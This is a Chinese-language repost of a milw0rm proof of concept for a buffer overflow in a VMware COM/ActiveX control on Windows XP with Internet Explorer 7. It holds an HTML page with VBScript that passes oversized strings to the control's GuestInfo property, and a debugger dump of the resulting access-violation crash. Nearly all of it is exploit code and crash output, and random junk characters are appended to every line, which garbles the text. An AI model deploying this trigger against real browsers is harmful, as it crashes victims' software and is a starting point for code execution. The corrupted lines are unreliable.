VMware的COM API的缓冲区溢出

原文来自http://www.milw0rm.com/ W=4|ahk$  
ZVz*1]}  
测试环境Windows XP Professional SP3+所有补丁，Internet Explorer 7 下 \b?O+;5Cj  
-------------------------------------------------- --------------------------- GuQ#  
<object classid='clsid:38DB77F9-058D-4955-98AA-4A9F3B6A5B06' id='test'></object> MT<3OKo?:  
t}gK)"g  
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> +'UxO'v3]  
Zk0?=f?j  
<script language='vbscript'> r8!M8Sc  
Sub tryMe O9Yk5b;  
  buff_1 = String (2000, "a") i(kr#XsU  
  buff_2 = String (2000, "b") -ha[xM05  
  test.GuestInfo (buff_1) = buff_2 NjSjE_S2B8  
End Sub V,:~FufM^  
</script> FBrJVaF  
)X-TJ+d  
Dump: +K[H!fD  
09:25:39.339  pid=0640 tid=0504  EXCEPTION (first-chance) xsXf_gGu  
              ---------------------------------------------------------------- gnU##Km|  
              Exception C0000005 (ACCESS_VIOLATION reading [00000070]) ca8.8uHY\  
              ---------------------------------------------------------------- C?%Oi:Gi&  
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??   |HB  
              EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 Iw) 'Yyg  
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? a,*~wmg  
              EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 pwO U6A!  
              ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 ~b.e9FhdA  
              EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 "#a,R^J  
              ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 5 MD=o7O^  
              EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 h*\/{$y  
              EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90 <:UP  
                            --> MOV EDX,[ECX+70] @fxDe[J:  
              ---------------------------------------------------------------- 1W +QcK4k  
'+c
Px\4  
09:25:39.339  pid=0640 tid=0504  EXCEPTION (unhandled) ,HE +|y#  
              ---------------------------------------------------------------- <ny)yK  
              Exception C0000005 (ACCESS_VIOLATION reading [00000070]) (G3S+T 9  
              ---------------------------------------------------------------- APA:K9jD  
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? $M=W`E[g  
              EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 EecV%E  
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? E5J2=xVW#  
              EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 igD,|YSK`z  
              ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 FX#fh 2  
              EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 _V`Gmy[]p  
              ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 sX~ `Vn&  
              EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 C;6N
u W  
              EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90 6?3f+=e"~!  
                            --> MOV EDX,[ECX+70] \MA4>  
              ----------------------------------------------------------------